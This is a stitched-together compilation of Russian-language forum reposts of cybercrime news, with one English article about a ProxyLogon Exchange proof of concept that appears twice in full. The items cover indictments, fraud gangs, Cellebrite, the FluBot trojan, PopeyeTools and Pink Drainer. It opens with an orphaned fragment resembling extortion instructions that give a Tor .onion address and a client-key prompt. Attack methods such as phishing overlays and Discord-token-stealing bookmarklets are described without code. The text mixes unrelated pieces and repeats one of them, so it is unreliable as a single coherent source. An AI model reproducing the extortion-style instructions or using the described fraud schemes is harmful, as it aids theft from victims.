2. Visit the following pages with the Tor Browser:
gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion
3. Enter your Client Key:
[client_key]
Четверо граждан Китая, которых подозревают в сотрудничестве с Министерством госбезопасности КНР, обвиняются в кибератаках на компании, университеты и государственные учреждения США, Германии, Канады, ЮАР, Великобритании, Австрии, Швейцарии, Саудовской Аравии и ряда других стран с 2011 по 2018 год, сообщает официальный сайт Министерства юстиции США.
"Большая часть украденных данных была связана с информацией, которая принесла значительную экономическую выгоду китайским компаниям и коммерческим секторам, в том числе информацию, которая позволила бы обойти длительные и трудоемкие процессы исследований и разработок", - отмечается в пресс-релизе минюста США.
Нападениям киберпреступников подверглись такие отрасли, как авиация, оборона, образование, государственное управление, здравоохранение, биофармацевтика и морское дело. В научно-исследовательских институтах и университетах кибератакам подверглись исследования таких инфекционных заболеваний, как Эбола, ВИЧ/СПИД, вирус Марбург и туляремия.
По данным Минюста, каждый из подсудимых обвиняется в сговоре с целью совершения компьютерного мошенничества, а также с целью совершения экономического шпионажа, что влечет за собой максимальное наказание до пяти и 15 лет тюремного заключения соответственно.
Высокопоставленный представитель администрации США заявил в понедельник, что США, НАТО и ЕС обвиняют власти Китая в сотрудничестве с наемными хакерами и обещают шаги в ответ на "безответственное" поведение Пекина.
• Source: justice[.]gov/opa/pr/four-chinese-nationals-working-ministry-state- security-charged-global-computer-intrusion
• Source: justice[.]gov/opa/press-release/file/1412916/download
• Source: justice[.]gov/opa/press-release/file/1412921/download
ZHU Yunmin 朱允敏 (STC Codes: 2612/0336/2404) Alias: Zhu Rong
WU Shurong 吴淑荣 (STC Codes: 0702/3219/2837) Aliases: goodperson, ha0r3n, Shi Lei
DING Xiaoyang 丁晓阳 (STC Codes: 0002/2556/7122) Aliases: Ding Hao, Manager Chen
CHENG Qingmin 程庆民 (STC Codes: 4453/1987/3046) Alias: Manager Cheng
Искусственный интеллект может приводить в действие автономные транспортные средства или способствовать созданию более безопасных вычислительных платформ. Однако в некоторых случаях невиновный человек может попасть в тюрьму из-за сомнительных доказательств на основе данных ИИ. Как сообщило информагентство Associated Press, именно это произошло с 65-летним Майклом Уильямсом (Michael Williams), когда он был арестован в августе прошлого года по обвинению в убийстве молодого человека во время общественных беспорядков.
В 2018 году власти города Чикаго заключили контракт на $33 млн с компанией ShotSpotter на установку сети наблюдения, которая использует специальный алгоритм на базе искусственного интеллекта для идентификации и триангуляции выстрелов. Именно из-за этой технологии Уильямс попал в беду в ночь на воскресенье, 31 мая 2020 года.
Поздно вечером Уильямс принял решение купить сигареты на местной заправке, но по прибытии обнаружил, что магазин был разграблен во время беспорядков. Затем он решил просто вернуться домой, когда по пути заметил 25-летнего Сафариана Херринга (Safarian Herring), который жестом пригласил его на прогулку. Вскоре рядом с ними на перекрестке остановился автомобиль. Неизвестный пассажир автомобиля попытался выстрелить в Уильямса, но промахнулся и попал в Херринга. 2 июня 2020 года в Херринг умер в больнице Сен-Бернар.
Через три месяца к Уильямсу пришли сотрудники полиции. Его допросили и поместили в камеру предварительного заключения, предъявив обвинение в убийстве первой степени. Доказательством преступления стали данные видеонаблюдения ShotSpotter. В ту ночь датчики ShotSpotter обнаружили громкий шум и предупредили полицию. Эти «доказательства» были использованы для закрепления версии прокуратуры о том, что Уильямс стрелял в Херринга в своей машине, хотя в ходе расследования не было обнаружено ни мотивов, ни очевидцев, ни орудия убийства.
Позже выяснилось, что изначально система ShotSpotter идентифицировала шум как взрыв фейерверка с вероятностью 98%. Однако сотрудник компании после прослушивания аудиофайла пометил шум как выстрел. Кроме того, в процессе постобработки алгоритм сменил местоположение источника шума.
Уильямс находился в заключении примерно 11 месяцев, где он дважды болел коронавирусной инфекцией (COVID-19) и у него развился неконтролируемый тремор. После этого долгого пребывания вдали от дома Уильямс пришел в зал суда, где судья Винсент Гоган (Vincent Gaughan) закрыл дело за недостаточностью доказательств. Таким образом, Уильямс наконец смог выйти из тюрьмы округа Кук вечером 23 июля как свободный человек.
Проект Tor объединяется с Tails, портативной операционной системой на базе Linux, ориентированной на сохранение конфиденциальности и анонимности пользователей.
Слияние происходит на фоне продолжающегося цифрового наблюдения и маневров регулирующих органов, направленных на взлом сквозного шифрования, в то время как цензура онлайн-сервисов также остается на глобальной повестке дня.
Tails будет включена «в структуру Tor Project», что позволит «упростить сотрудничество, повысить устойчивость, снизить накладные расходы, расширить программы обучения и пропаганды для противодействия большему числу цифровых угроз», - говорится в опубликованном сегодня блоге директора по связям с общественностью и коммуникациям Tor Project Павла Зонеффа.
Два проэкта становятся одним:
Основанная в 2006 году некоммерческая организация Tor Project наиболее
известна своей работой над Tor («The Onion Router») - сетью, ориентированной
на конфиденциальность, которая анонимизирует интернет-трафик, направляя его
через множество разрозненных серверов и шифруя данные по пути. Проект Tor
разрабатывает браузеры для всех основных операционных систем, а некоторые
крупнейшие технологические компании мира используют Tor для поддержки
различных инициатив, направленных на обеспечение конфиденциальности.
Tails, в свою очередь, имеет предустановленное окружение рабочего стола и построен на базе дистрибутива Linux Debian. Она легкая и может загружаться с портативных устройств хранения данных, таких как USB-накопитель, не оставляя после себя цифрового следа.
Проекты с открытым исходным кодом Tor и Tails не чужие друг другу. Выпущенный в 2009 году, Tails, или “The Amnesic Incognito Live System”, по умолчанию подключается к интернету через Tor. Более того, за прошедшие годы Tails получил поддержку от множества сторонних организаций и фондов, включая сам Tor Project, который финансировал ресурсы разработчиков для проекта.
Слияние Tor Project и Tails имеет большой смысл, учитывая их внимание к конфиденциальности и анонимности в Интернете, не говоря уже об их общей истории. Оно также может оказаться полезным для тех, кто подвергается наибольшему риску в мире, который все больше приближается к круглосуточной цифровой слежке: активисты, журналисты и все, кто подвержен слежке в Интернете, могут оказаться в выигрыше.
Не кто иной, как Эдвард Сноуден, пел дифирамбы обеим платформам и ранее говорил, что использовал Tails в своих разоблачительных целях против Агентства национальной безопасности США (АНБ) более 10 лет назад.
Слияние произошло после того, как Tails обратилась к проекту Tor в конце 2023 года, говорится в блоге. Tails отметила, что «переросла свою существующую структуру».
«Запуск Tails как независимого проекта в течение 15 лет был огромным трудом, но не по тем причинам, которые вы могли бы ожидать», - сказал Интригери, руководитель команды Tails OS, в своем заявлении. «Самой сложной частью была не техника, а решение таких важных задач, как сбор средств, финансы и HR. После попыток справиться с ними разными способами я очень рад, что теперь Tails находится под крылом Tor Project».
Объединив свои ресурсы, включая технологии и персонал, Tor Project заявляет, что будет лучше оснащен для борьбы с «угрозой глобальной массовой слежки и цензуры для свободного Интернета». Это включает в себя расширение сферы деятельности проекта Tor для «решения более широкого спектра задач по обеспечению конфиденциальности и безопасности», что предполагает более тесное технологическое взаимодействие, а также активизацию образовательных, обучающих и просветительских программ.
«Объединив эти две организации, мы не только облегчаем работу наших команд, но и обеспечиваем устойчивое развитие и продвижение этих жизненно важных инструментов», - говорится в заявлении Изабелы Фернандеш, исполнительного директора Tor Project. «Совместная работа обеспечивает более быстрое и эффективное сотрудничество, позволяя быстро интегрировать новые функции из одного инструмента в другой».
source: [https://techcrunch.com/2024/09/26/t...a-linux-based-portable-os- focused-on-privacy/](https://techcrunch.com/2024/09/26/the-tor-project-merges- with-tails-a-linux-based-portable-os-focused-on-privacy/)
Преступная группировка появилась в начале апреля 2022 года. Её основателями стали 41-летний Шахмар Дзейтов и 36-летний Шукмарбек Мавлянов. Мужчины обратили внимание на большой спрос на валюту из-за введённых ЦБ запретов на обмен и решили подзаработать. Позже к ним присоединились и ещё несколько человек. Всего в преступную группу входило как минимум 13 человек (среди них одна женщина). Почти все участники ОПГ были уроженцами Киргизии.
Под видом проведения валютно-обменных операций члены группировки забирали деньги (чаще всего для подсчёта) и сбегали.
При этом у группы были чётко распределены обязанности: часть участников занимались поиском людей, желавших поменять валюту, другие занимались непосредственно обменом, а третья группа — охраной.
В настоящий момент задержаны 7 человек (6 из них арестованы, один — под запретом определённых действий). Теперь на них возбуждено уголовное дело еще и по статье «Организация преступного сообщества». Ещё 6 человек объявлены в федеральный розыск.
Фигурант дела о крупном мошенничестве начальник НИО-3 АО "Концерн "Автоматика" Александр Нестеров признал вину и по ходатайству следствия был отпущен из СИЗО под домашний арест.
Ранее Мосгорсуд перевел под домашний арест второго фигуранта по делу - генерального директора концерна "Автоматика" Андрея Моторко.
Нестеров также находился в СИЗО по обвинению по ч. 4 ст. 159 УК РФ (мошенничество в особо крупном размере). По данным СМИ, концерн "Автоматика" осенью 2021 года приобрел разработку для раскрытия владельцев анонимных Telegram-каналов, назвав ее "Охотник". Согласно информации из открытых источников, "Охотник" может выявлять имена, прозвища, контакты и другие данные при анализе мессенджеров, даркнета и блокчейнов. СК возбудил уголовное дело по факту мошенничества в "Автоматике" в отношении неустановленных лиц.
Следствие полагает, что концерн выдал за свою разработку антенные системы для транспорта, закупленные в Китае. Однако на эти цели концерн получил субсидию 300 млн рублей. В связи с возбуждением уголовного дела в тот же день в "Автоматике" прошли обыски.
tass.ru/proisshestviya/22349579
Израильская компания Cellebrite, производитель программно-аппаратных комплексов по взлому мобильных устройств на Android и iOS, полностью прекратила сотрудничество с клиентами из России и Белоруссии, основная масса которых – силовые ведомства и финансовые организации. В компании заявили, что она покидает обе страны «незамедлительно» (immediately).
Представители Cellebrite не стали уточнять причины принятия такого решения. Со слов ее генерального директора Йоси Кармила (Yossi Carmil), компания «постоянно пересматривает и обновляет свою политику с целью гарантировать клиентам, что работает в полном в соответствии с принятыми международными правилами и положениями».
По информации израильской газеты Haaretz, случившееся напрямую связано с попытками российских силовиков взломать смартфоны, принадлежащие оппозиционерам. В статье издания сказано, что российские силовые структуры хотели получить доступ к данным Любови Соболь (юрист «Фонда борьбы с коррупцией», возглавляемого Алексеем Навальным), для чего применили комплекс UFED, разработанный Cellebrite.
По информации Haaretz, правоохранительные органы Белоруссии и России также использовали технологии Cellebrite для преследования и других оппозиционеров, а вместе с ними – представителей национальных меньшинств, правозащитников, а также людей, относящих себя к ЛГБТ.
Кто призывал к уходу Cellebrite из России
Добиться прекращения сотрудничества Cellebrite с российскими и белорусскими силовиками стремился израильский юрист, активист и борец за права человека Эйтай Мак (Eitay Mack). Объединившись с 80 другими правозащитниками (их имена и гражданство издание не раскрывает), он нашел и опубликовал доказательства, указывающие на использование разработок Cellebrite для преследования политических деятелей, а также различных групп меньшинств в России.
Cellebrite, пишет Haaretz, прекратила экспорт своих технологий в Белоруссию и Россию после того, как эти документы были обнародованы. В прошлом компания отрицала продажу технологий Белоруссии, но следственные органы выяснили, что администрация Лукашенко активно использовала хакерские технологии Cellebrite на протяжении последних пяти лет, с 2016 г.
Кто закупает продукцию Cellebrite в России
Основной продукт Cellebrite – это аппаратно-программный комплекс UFED, существующий в нескольких модификациях. Российские силовые структуры тратят на закупку этих приборов миллионы рублей, чтобы иметь возможность взламывать смартфоны российских граждан.
Например, в марте 2018 г. стало известно, что управление Следственного комитета (СК) по Волгоградской области закупило комплексы UFED Touch2 Ultimate Ruggedized на 800 тыс. руб. Поставку оборудования обеспечила российская компания «ЛАН-проект».
За год до этого та же «ЛАН-проект» реализовала обновление ПО UFED Touch до версии UFED Touch2 Ultimate для МВД по Хабаровскому краю. Свою работу компания оценила в 1,26 млн руб.
В августе 2018 г. приборы для взлома мобильных устройств россиян закупило Военное следственное управление СК в Центральном и Восточном военном округах. Размер вложений превысил 5 млн руб., а поставщиком выступила компания «Экспертэкспресс». В данном случае закупались приборы UFED 4PC Ultimate и MagiCube.
Что немаловажно, продукцией Cellebrite интересуются не только силовые ведомства, но и финансовые организации. В августе 2017 г. тендер на поставку комплексов UFED Touch2 провел Сбербанк, а победила в нем уже знакомая «ЛАН- проект». В ноябре 2017 г. с ней был заключен контракт – за 4,1 млн руб. она поставила Сбербанку 11 таких комплексов. В банке объяснили, что устройства Cellebrite используется финорганизацией. в случаях заражения смартфонов неизвестными вирусами, для поиска и анализа их новых разновидностей. Согласие владельца смартфона при этом обязательно.
Насколько сильна Cellebrite
Cellebrite, основанная в Израиле в 1999 г., в настоящее время располагает широким спектром наработок, позволяющим взламывать не только смартфоны, но и специализированное программное обеспечение. В декабре 2020 г. ее специалистам удалось обойти алгоритмы защиты Signal – мессенджера, считавшегося самым безопасным и неприступным в мире.
CNews писал, что обойти защиту Signal специалисты Cellebrite смогли при помощи собственного программного инструмента Physical Analyzer, предназначенного для систематизации и обработки информации, полученной со смартфона. Это ПО постоянно усовершенствуется, и одна из его последних версий смогла взломать мессенджер. Сотрудники компании сумели восстановить переписку одного из пользователей и заодно весь медиаконтент, который он отправлял или получал от собеседников.
По данным специалистов, всего за два месяца Android-малварь FluBot заразила более 60 000 устройств, причем 97% ее жертв находятся в Испании.
__https://twitter.com/x/status/1346807891152560131
Впервые FluBot был замечен экспертами ThreatFabric в начале текущего года, а теперь аналитики швейцарской фирмы PRODAFT подготовили о малвари [подробный отчет](https://raw.githubusercontent.com/prodaft/malware- ioc/master/FluBot/FluBot.pdf).
Эксперты описывают опасный банковский троян, который способен показывать фейковые экраны логина поверх других приложений. Таким образом вредонос собирает учетные данных от электронного банкинга и данные платежных карт своих жертв.
Внушительное количество заражений FluBot, скорее всего, объясняется наличием в его коде малвари червеобразного механизма, благодаря которому злоумышленники могут загрузить адресную книгу жертвы на свой управляющий сервер, и рассылать оттуда SMS-спам.
«В настоящее время с зараженных устройств собрано более 11 000 000 телефонных номеров, что составляет 25% всего населения Испании, — пишут исследователи. — По нашим оценкам, вредоносная программа способна собрать почти все телефонные номера в Испании за полгода, если не будет предпринято никаких действий».
Click to expand...
Такие SMS-сообщения содержат различные приманки, чтобы заставить получателя перейти по ссылке. Ссылки обычно ведут на взломанные сайты, где операторы FluBot размещает свою малварь, скрытую внутри APK-файлов.
Если пользователь загружает и устанавливает такое "приложение", игнорируя все предупреждения операционной системы об опасности установки приложений из сторонних источников, происходит заражение FluBot.
Вредонос не имеет полного контроля над устройством, если пользователь сам не предоставит ему доступ к Accessibility service. Если права получены, малварь может выполнять команды и имитировать прикосновения к экрану, оставаясь при этом невидимой для владельца устройства. В итоге FluBot способен перехватывать и блокировать уведомления приложений, устанавливать себя в качестве приложения для работы SMS по умолчанию, использовать USSD и совершать телефонные звонки, а также похищать списки контактов. Также доступ к Accessibility позволяет трояну показывать фишинговые экраны поверх других легитимных приложений.
[](https://xakep.ru/wp- content/uploads/2021/03/341626/FluBot-screens.png)
Примеры вредоносных оверлеев
Эксперты PRODAFT пишут, что смогли получить доступ к панели управления FluBot, что позволило им определить количество зараженных устройств. Исследователи уже уведомили о своих выводах испанские правоохранительные органы, чтобы власти могли принять меры против ботнета.
[](https://xakep.ru/wp- content/uploads/2021/03/341626/FluBot-CC-1.png)
Приветственное сообщение на C&C-сервере
Источник: xakep.ru/2021/03/05/flubot/
Не стал копипастить статью сюда кому надо прочтут.

](https://xakep.ru/2024/04/03/chrome-dbsc/)
Разработчики Google анонсировали новую защитную функцию Chrome под названием Device Bound Session Credentials, которая привязывает файлы cookie к конкретному устройству, что должно помешать хакерам похищать их и использовать для взлома учетных записей.
 xakep.ru
Хочется мнения услышать ваши.
Ей сказали, что её накопления переводят «националистам из Украины».
Сначала 34-летней Людмиле из Химок позвонил «следователь из управления по борьбе с экономическими преступлениями». Мужчина огорошил женщину, что некий гражданин взял на её имя кредит. Пока Люда собиралась с мыслями (и рассказывала, сколько всего денег у неё лежит в Сбере), её переключили на финансового специалиста, а затем и «сотрудника ФСБ». Он испугал жертву еще сильнее — рассказал, что её сбережения могут отправить националистам на Украину.
В конце концов, с Людой говорил «сотрудник Центробанка». Он объяснил женщине, что необходимо «обновить счёт» — снять все деньги, взять еще несколько кредитов в банках и отправить их на безопасные счета. Так Людмила и сделала. Опомнилась женщина только через два дня, когда уже отправила мошенникам 20 миллионов рублей.
Что интересного — как пострадавшая рассказала полицейским, она никогда не слышала о мошенничествах по телефону, поэтому сразу поверила звонившим.
A security researcher has released a new proof-of-concept exploit this weekend that requires slight modification to install web shells on Microsoft Exchange servers vulnerable to the actively exploited ProxyLogon vulnerabilities.
Since Microsoft disclosed actively exploited Microsoft Exchange security vulnerabilities, known collectively as ProxyLogon, administrators and security researchers have been scrambling to protect vulnerable servers exposed on the Internet.
These attacks are being used to drop
web shells, cryptominers, and more recently, the DearCry ransomware on
exploited servers.
Earlier this week, a security researcher named Nguyen Jang published a blog post detailing a proof of concept (POC) exploit for the Microsoft Exchange ProxyLogon vulnerability. Jang also shared a purposely broken exploit on GitHub that needs some fixes to work properly.
"Firstly, the PoC I gave can not run correctly. It will be crashed with many of errors. Just for trolling the reader," Jang told bleepingcomputer[.]
The PoC, though, provided enough information that security researchers and threat actors could use it to develop a functional remote code execution exploit for Microsoft Exchange servers.
Soon after the PoC was published, Jang received an email from Microsoft-owned GitHub stating that the PoC was being taken down as it violated Acceptable Use Policies.
In a statement to BleepingComputer, GitHub said they took down the PoC to protect devices that are being actively exploited.
"We understand that the publication and distribution of proof of concept exploit code has educational and research value to the security community, and our goal is to balance that benefit with keeping the broader ecosystem safe. In accordance with our Acceptable Use Policies, GitHub disabled the gist following reports that it contains proof of concept code for a recently disclosed vulnerability that is being actively exploited." - GitHub.
Click to expand...
This weekend, a different security researcher published a new ProxyLogon PoC that requires very little modification to exploit a vulnerable Microsoft Exchange server and drop a web shell on it.
Will Dorman, a Vulnerability Analyst at the CERT/CC, tested the vulnerability on a Microsoft exchange server and told BleepingComputer that it worked with very little modification.
"It's within the reach of "script kiddie" now," warned Dorman in our discussion about the PoC.
As you can see from the image below, Dorman used the exploit against a Microsoft Exchange server and remotely installed a web shell, and executed the 'whoami' command.
Exploiting a Microsoft
Exchange server
Another image shared by Dorman shows that the exploit dropped the test11.aspx
web shell in the specified location on the server.
Web shell
dropped on exploited Microsoft Exchange server
Didier Stevens, a senior analyst at NVISO and SANS ISC senior handler, also
tested the exploit against a Microsoft Exchange virtual machine but did not
have as much luck with the PoC.
In a conversation with BleepingComputer, Stevens said that he tested the new PoC against an unpatched Exchange 2016 with no cumulative updates. Still, the PoC would not work without tweaking some Active Directory settings.
However, Stevens said that new information in the PoC released this weekend enabled him to get Jang's PoC working to achieve successful remote code execution against his Microsoft Exchange server.
Stevens also agreed with Dorman's assessment that the information disclosed in the new PoC would make it easier for less-skilled threat actors, known as 'Script Kiddies,' to create a working ProxyLogon exploit.
Due to the large number of vulnerable servers still exposed on the Internet, BleepingComputer will not be sharing links to the PoC released this weekend.
With exploits for the Microsoft Exchange vulnerabilities becoming publicly available, it is more important than ever that administrators patch their servers.
According to Palo Alto Networks' research, there are approximately 80,000 vulnerable Microsoft Exchange servers exposed on the Internet.
"The number of vulnerable servers running old versions of Exchange that cannot directly apply the recently released security patches dropped over 30% from an estimated 125,000 to 80,000, according to Expanse internet scans conducted March 8 and 11," Palo Alto Networks told bleepingcomputer[.]
Microsoft also warned that even though there has been a significant drop of vulnerable servers, there are still many that need to be patched[.]
"Based on telemetry from RiskIQ, we saw a total universe of nearly 400,000 Exchange servers on March 1. By March 9 there were a bit more than 100,000 servers still vulnerable. That number has been dropping steadily, with only about 82,000 left to be updated," Microsoft stated in a [blog post](https://www.microsoft.com/security/blog/2021/03/12/protecting-on- premises-exchange-servers-against-recent-attacks/).
web shells, cryptominers, and more recently, the DearCry ransomware on exploited servers.
Earlier this week, a security researcher named Nguyen Jang published a blog post detailing a proof of concept (POC) exploit for the Microsoft Exchange ProxyLogon vulnerability. Jang also shared a purposely broken exploit on GitHub that needs some fixes to work properly.
"Firstly, the PoC I gave can not run correctly. It will be crashed with many of errors. Just for trolling the reader," Jang told bleepingcomputer[.]
The PoC, though, provided enough information that security researchers and threat actors could use it to develop a functional remote code execution exploit for Microsoft Exchange servers.
Soon after the PoC was published, Jang received an email from Microsoft-owned GitHub stating that the PoC was being taken down as it violated Acceptable Use Policies.
In a statement to BleepingComputer, GitHub said they took down the PoC to protect devices that are being actively exploited.
"We understand that the publication and distribution of proof of concept exploit code has educational and research value to the security community, and our goal is to balance that benefit with keeping the broader ecosystem safe. In accordance with our Acceptable Use Policies, GitHub disabled the gist following reports that it contains proof of concept code for a recently disclosed vulnerability that is being actively exploited." - GitHub.
Click to expand...
This weekend, a different security researcher published a new ProxyLogon PoC that requires very little modification to exploit a vulnerable Microsoft Exchange server and drop a web shell on it.
Will Dorman, a Vulnerability Analyst at the CERT/CC, tested the vulnerability on a Microsoft exchange server and told BleepingComputer that it worked with very little modification.
"It's within the reach of "script kiddie" now," warned Dorman in our discussion about the PoC.
As you can see from the image below, Dorman used the exploit against a Microsoft Exchange server and remotely installed a web shell, and executed the 'whoami' command.
Exploiting a Microsoft
Exchange server
Another image shared by Dorman shows that the exploit dropped the test11.aspx
web shell in the specified location on the server.
Web shell
dropped on exploited Microsoft Exchange server
Didier Stevens, a senior analyst at NVISO and SANS ISC senior handler, also
tested the exploit against a Microsoft Exchange virtual machine but did not
have as much luck with the PoC.
In a conversation with BleepingComputer, Stevens said that he tested the new PoC against an unpatched Exchange 2016 with no cumulative updates. Still, the PoC would not work without tweaking some Active Directory settings.
However, Stevens said that new information in the PoC released this weekend enabled him to get Jang's PoC working to achieve successful remote code execution against his Microsoft Exchange server.
Stevens also agreed with Dorman's assessment that the information disclosed in the new PoC would make it easier for less-skilled threat actors, known as 'Script Kiddies,' to create a working ProxyLogon exploit.
Due to the large number of vulnerable servers still exposed on the Internet, BleepingComputer will not be sharing links to the PoC released this weekend.
With exploits for the Microsoft Exchange vulnerabilities becoming publicly available, it is more important than ever that administrators patch their servers.
According to Palo Alto Networks' research, there are approximately 80,000 vulnerable Microsoft Exchange servers exposed on the Internet.
"The number of vulnerable servers running old versions of Exchange that cannot directly apply the recently released security patches dropped over 30% from an estimated 125,000 to 80,000, according to Expanse internet scans conducted March 8 and 11," Palo Alto Networks told bleepingcomputer[.]
Microsoft also warned that even though there has been a significant drop of vulnerable servers, there are still many that need to be patched[.]
"Based on telemetry from RiskIQ, we saw a total universe of nearly 400,000 Exchange servers on March 1. By March 9 there were a bit more than 100,000 servers still vulnerable. That number has been dropping steadily, with only about 82,000 left to be updated," Microsoft stated in a [blog post](https://www.microsoft.com/security/blog/2021/03/12/protecting-on- premises-exchange-servers-against-recent-attacks/).
Правоохранительные органы США завили о закрытии маркетплейса PopeyeTools и конфискации связанных доменов. Трем администраторам платформы также предъявлены обвинения. Спецслужбы также изъяли криптовалюту на сумму $283 000, связанную с незаконной деятельностью платформы и принадлежащую одному из обвиняемых.
PopeyeTools, работавшая в открытом доступе с 2016 года, предлагала услуги, связанные с киберпреступлениями, включая продажу финансовой и личной информации, а также инструменты для мошенничества и кибератак.
По данным правоохранительных органов, платформа стала центром для тысяч пользователей со всего мира, включая тех, кто участвовал в операциях с программами-вымогателями и другими сложными киберугрозами. Общая прибыль оценивается в $1,7 млн, а количество пострадавших составляет как минимум 227 000 человек.
На платформе предлагались следующие услуги:
Наборы данных действующих платёжных карт и персональной информации стоимостью около $30 за карту.
Логи с данными банковских счетов для несанкционированного доступа.
Базы email-адресов для фишинговых атак или спам-рассылок.
Шаблоны сайтов для реализации мошеннических схем.
Учебные материалы для совершения финансовых преступлений и других видов мошенничества.
Инструменты проверки актуальности украденных данных банковских карт и счетов.
Для привлечения клиентов и удержания аудитории сервис предлагал политику возврата средств или замену данных, если они оказывались недействительными.
В ходе операции были изъяты домены PopeyeTools[.]com, PopeyeTools[.]uk и PopeyeTools[.]to. На данный момент посетители данных сайтов видят предупреждение о том, что информация о пользователях платформы находится в распоряжении следственных органов.
Трое предполагаемых администраторов платформы обвиняются в сговоре с целью совершения мошенничества с устройствами доступа, продаже таких устройств и предложении их через платформу. Если суд признает их виновными, им грозит до 10 лет лишения свободы за каждое из предъявленных обвинений. Однако арестов пока не произведено, и остаётся неизвестным, где именно находятся обвиняемые и возможна ли их экстрадиция.
• Source: https://www.justice[.]gov/opa/pr/justice-department-seizes- cybercrime-website-and-charges-its-administrators
Группировка Pink Drainer «заработала» около 3 млн долларов в криптовалюте, используя фишинг и социальную инженерию. Злоумышленники выдавали себя за журналистов и атаковали пользователей Discord и Twitter, успешно скомпрометировав учетные записи 1932 жертв.
Эксперты [ScamSniffer](https://drops.scamsniffer.io/post/pink-drainer- steals-3m-from-multiple-hack-events-including-openai-cto-orbiter-finance/) рассказывают, что заметили злоумышленников, когда те украли у одного человека NFT на сумму 327 000 долларов. В общей сложности группировка похитили цифровые активы на сумму 2 997 307 долларов (в основном в Mainnet и Arbitrum).
[](https://xakep.ru/wp- content/uploads/2023/06/426917/losses.jpg)
По данным исследователей, среди недавних целей хакеров — технический директор OpenAI Мира Мурати, Стив Аоки, а также Evmos, Pika Protocol, Orbiter Finance, LiFi, Flare Network, Cherry Network, и Starknet.
Pink Drainer взламывает чужие учетные записи с помощью социальной инженерии. Как правило, злоумышленники несколько дней выдают себя за журналистов популярных изданий, включая Cointelegraph и Decrypt, и якобы хотят взять интервью у жертвы.
[](https://xakep.ru/wp- content/uploads/2023/06/426917/decrypt.jpg)
Завоевав доверие цели, хакеры сообщают жертвам, что те должны пройти проверку KYC, чтобы подтвердить свою личность. И направляют пользователя на вредоносный сайт для кражи аутентификационных токенов Discord.
Такие сайты могут имитировать реально существующего в Discord бота Carl, и предлагают жертвам добавить закладку (якобы чтобы пройти верификацию), содержащую вредоносный код JavaScript, с помощью кнопки «Drag Me» на вредоносной странице.
[](https://xakep.ru/wp- content/uploads/2023/06/426917/drag-me.jpg)
В итоге вредоносный код ворует токены Discord, позволяя хакерам захватить учетную запись жертвы без учетных данных и кода двухфакторной аутентификации. Чтобы расширить контроль, злоумышленники назначают себя администраторами и удаляют других администраторов сервера.
Если взломанная учетная запись принадлежит известному проекту или личности с большим количеством подписчиков, злоумышленники используют полученный доступ для рекламы фейковых раздач криптовалюты, минтинга, криптовалютного скама и фишинговых страниц.
Мошенническую схему разоблачили оперативники отдела противодействия киберпреступлениям в Николаевской области ГКП НПУ совместно с дознавателями Николаевского районного управления полиции, при процессуальном руководстве прокуратуры и силовой поддержке спецназа.
Полицейские установили, что организовал деятельность центра 28-летний житель Николаева, помощь в поиске и вербовке операторов ему оказывали две местные жительницы. Мошенники арендовали офисные помещения, которые обустраивали необходимой оргтехникой и методическими материалами для обучения "сотрудников". После прохождения обучения кандидат должен был сдать экзамен на знание алгоритма действий "звонок сотрудника правоохранительных органов" и "звонок сотрудника банка", после которого допускался к работе в call-центре.
Затем, используя методы социальной инженерии, злоумышленники сперва выпрашивали у граждан информацию о реквизитах банковских карточек, а, получив доступ к счетам, выводили деньги на подконтрольные счета. Чтобы у собеседников не возникало никаких подозрений они разработали целую схему и действовали в соответствии с инструкциями, представляясь следователями и работниками банковских учреждений.
В результате следственных действий правоохранители изъяли из офисов call- центра 33 системных блока, 2 ноутбука, 27 мобильных телефонов, 189 сим-карт различных мобильных операторов и банковские карточки, а также документы, подтверждающие противоправную деятельность. Сейчас решается вопрос о наложении ареста на имущество центра, а всю изъятую технику направили на экспертизу.
Сейчас продолжается досудебное расследование, начатое по ст. 190 Уголовного кодекса Украины "Мошенничество".
Правоохранители принимают меры для установления круга лиц, пострадавших от действий мошенников, и общую сумму нанесенного ущерба гражданам.
Злоумышленники под видом предоставления услуг по трудоустройству завладели средствами 63 потерпевших на сумму около миллиона гривен. Фигурантам грозит до 12-ти лет лишения свободы с конфискацией имущества.
Напомним, что в прошлом году сотрудники управления противодействия киберпреступлениям в Киеве совместно со следователями Дарницкого управления полиции разоблачили группу мошенников.
В марте 2022 года сообщники - мужчины и женщины в возрасте от 18 до 39 лет, уроженцы Житомирской области, которые временно проживали в Киеве, создали пять колл-центров в столичных арендованных помещениях и предлагали потенциальным клиентам работу. Преимущественно в то время жертвами злоумышленников стали вынужденные переселенцы и беженцы, которые искали работу за рубежом, а также иностранные граждане. После получения от потерпевших платежа в сумме около 250 евро никаких действий, направленных на трудоустройство граждан злоумышленники не совершали, взамен полностью прекращали с ними связь, а полученные средства через фиктивных ФЛП присваивали.
В ходе досудебного расследования проведено более 30 обысков по месту проживания фигурантов и колл-центров, изъяты денежные средства, более 100 единиц компьютерной техники, мобильные телефоны, банковские карточки и черновые записи, которые подтверждают противоправную деятельность.
Полицейские собрали доказательства относительно совершения преступлений в отношении 63 потерпевших, а сумма ущерба достигает около 1 000 000 гривен. Правоохранители славят личности других «заробитчан», пострадавших от действий мошенников, в том числе тех, которые сейчас находятся за границей.
Сейчас следственным отделом Дарницкого управления полиции завершено досудебное следствие и направлен в суд обвинительный акт в отношении преступной организации из 16 человек, которые длительное время занимались мошенническими действиями. Подозреваемых обвиняют в совершении правонарушений предусмотренных ч. 1 и 2 ст. 255 - создание, руководство преступным сообществом или преступной организацией, а также участие в ней, ч. 4 ст. 190 - мошенничество и ч. 2 ст. 205-1 - подделка документов, которые подаются для проведения государственной регистрации юридического лица и физических лиц-предпринимателей Уголовного кодекса Украины.
Фигурантам грозит до 12-ти лет лишения свободы с конфискацией имущества.
Полиция Великобритании вернула $8 млн фунтов трейдеру, у которого похитили 445 BTC.
Хакеров, которые совершили кражу, приговорили к 15 годам лишения свободы.
Полиция Великобритании вернула 8 млн фунтов ($10 млн) в биткоинах трейдеру, у которого в 2017 году похитили 445 BTC.
«Рады сообщить, что в начале этой недели совместными усилиями отделов по борьбе с мошенничеством и киберпреступностью удалось вернуть законному владельцу 8 млн фунтов […]», — говорится в заявлении полиции.
В сообщении Protos сказано, что в 2017 году группа хакеров похитила миллионы у пользователей австралийской криптовалютной биржи CoinSpot. По данным властей, злоумышленники отправляли криптовалюты в Дубаи для конвертации их в наличные.
По данным журналистов, банда раздавала подарочные карты на 5 000 фунтов незнакомцам, а также покупала машины для людей, которых они встретили в пабе.
Членов мошеннической группировки приговорили к 15 годам лишения свободы, а их вероятный «главарь» умер.
